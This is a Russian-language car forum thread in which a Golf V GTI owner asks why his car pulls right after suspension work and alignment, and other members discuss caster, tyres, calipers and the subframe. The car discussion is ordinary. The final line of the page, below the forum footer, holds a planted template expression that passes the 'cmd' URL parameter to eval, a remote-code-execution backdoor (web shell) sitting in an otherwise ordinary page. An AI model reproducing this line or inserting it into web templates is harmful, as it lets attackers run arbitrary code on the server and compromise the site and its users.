+ Ответить в теме
Показано с 1 по 9 из 9

Тема: люфтит по адскому


  1. #1
    GTI-Racing popoopop123 is on a distinguished road Аватар для popoopop123
    Регистрация
    26.07.2012
    Откуда
    Msk
    Машина
    Golf-V GTI
    Сообщений
    238

    люфтит по адскому

    Всем привет! Собственно было все хорошо) потом пришло время менять тормозные диски, одновременно с ними поменял нижние опоры стоек, сайленты, рулевые тяги, шаровые опоры...
    Забрал машину и заметил что машину начало везти вправо... и руль соответственно тоже поворачивает вправо.
    Сделал Сход/Развал не помогло))) Сделал второй раз тоже не помогло)))
    По схождению и развалу все в зеленых границах и очень хорошо, но есть еще один угол так называемый Кастер... который как мне говорят не регулируется, и тонко намекают купить нижний рычаг (такой здоровый треугольник) якобы он чуть помнулся, что не видно на глаз... и поэтому машину ведет вправо.

    Кто что думает и было ли у кого?

  2. #2
    GTI-Racing M3f has a spectacular aura about M3f has a spectacular aura about Аватар для M3f
    Регистрация
    07.10.2010
    Откуда
    Москва
    Машина
    R32 mk5
    Сообщений
    381
    На 2 Гольфах кастор "уходил", все ехало прямо.
    А может суппорт клинит?

  3. #3
    GTI-Racing popoopop123 is on a distinguished road Аватар для popoopop123
    Регистрация
    26.07.2012
    Откуда
    Msk
    Машина
    Golf-V GTI
    Сообщений
    238
    Вот данные по сход развалу.

    Че делать уже не знаю! Даже подрамник пытались подвигать нифига не регулируется..... Только хуже кастр стал.

    :expect: :expect: :expect:

  4. #4
    Если резина не направленая то поменяй колёса передние местами.Если направленая то поменяй перед и зад полностью местами. О результатах напиши тут.
    Обычно если всё в зелени то виновата резина(у меня было уже сто раз так ).

    Добавлено через 2 минуты
    Ща посмотрел распечатку с кастером у тебя всё впорядке.
    Последний раз редактировалось Leonid; 23.08.2013 в 12:32. Причина: Добавлено сообщение

  5. #5
    GTI-Racing popoopop123 is on a distinguished road Аватар для popoopop123
    Регистрация
    26.07.2012
    Откуда
    Msk
    Машина
    Golf-V GTI
    Сообщений
    238
    Прошло почти 2 года, но проблема не ушла... За это время поменял резину на новую, диски на новые, стойки аммортов передних....... Всё по прежнему... Тормоза не клинит...
    Сейчас заказал новые амморты и пружины bilstain b8 & h&R.
    Вопрос следующий... нашел еще нижние рычаги и поворотные кулаки от passat b6 аллюминиевые бу оригинал (на гольфе сплав чугуна), стоит ли брать? Или деньги на ветер? Кучу форумов перекурил народ пишет что возможно в них проблема! Но у всех они гнутся при ДТП с выворачиванием колес, короче где на глаз заметно. А я только 1 раз прыгнул на паребрике (он же бордюр) и 1 раз в яму попадал.

    К слову о кастере с сайта shod-razval.net цитирую "Угол продоьного наклона шкворня задан геометрией стоек и нижних рычагов и не регулируется. Угол продольного наклона шкворня (Caster)-- способствует стабилизации передних колес в направлении прямолинейного движения автомобиля.При нарушении этого угла вследствие удара (например в бордюр), как правило, деформируется подрамник(балка) или нижний рычаг подвески."

    Как блин подрамник может деформироваться???????????????????????????? неужели все настолько хрупкое в GTI

  6. #6
    GTI-Racing refutation is on a distinguished road Аватар для refutation
    Регистрация
    17.02.2014
    Откуда
    Moscow
    Машина
    VW Golf GTI 6 Revo st2
    Сообщений
    605
    Про подрамник не раз слышал. Писали, что необходимо при сход-развале регулировать подрамник.

  7. #7
    GTI-Racing Окислитель is on a distinguished road Аватар для Окислитель
    Регистрация
    16.04.2008
    Откуда
    Москва
    Машина
    GTI 5
    Сообщений
    847
    Машина едет колесами по дороге. Это единственное место соприкосновения от которого машина едет туда или сюда.
    Так вот от того, как стоят колеса и будет зависеть куда едет машина.
    Подрамником на гольфе можно поправить кастер. Но, это самая меньшая величина которая влияет на вектор тяги. Я ездил несколько лет с разным кастером по левому и правому колесу. Никаких уводов не было. Кроме того, даже сильно разный по клёсам кастер можно нивелировать другим углом установки колес.

    По этому я бы не советовал первым делом рваться двигать подрамник.
    Оборудование и инструмент в том числе для ремонта любимого VW.

  8. #8
    GTI-Racing popoopop123 is on a distinguished road Аватар для popoopop123
    Регистрация
    26.07.2012
    Откуда
    Msk
    Машина
    Golf-V GTI
    Сообщений
    238
    Посоветуйте сервис, или человека грамотного. Нужно поставить амморты с пружинами, произвести диагностику, и сход развал сделать. Если не проблема не уйдет я уже не знаю че делать

  9. #9
    GTI-Racing Окислитель is on a distinguished road Аватар для Окислитель
    Регистрация
    16.04.2008
    Откуда
    Москва
    Машина
    GTI 5
    Сообщений
    847
    Я подвеску перекидывал с Фольксваген Север. Через Сергея Кипера. Тогда же и сход развал делал. Если у них люди не поменялись то сделали хорошо.
    Неофициалов к сожалению на порекомендую, тех к кому обычно езжу на ТО и всякое такое нет сход развала.
    Оборудование и инструмент в том числе для ремонта любимого VW.

+ Ответить в теме

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}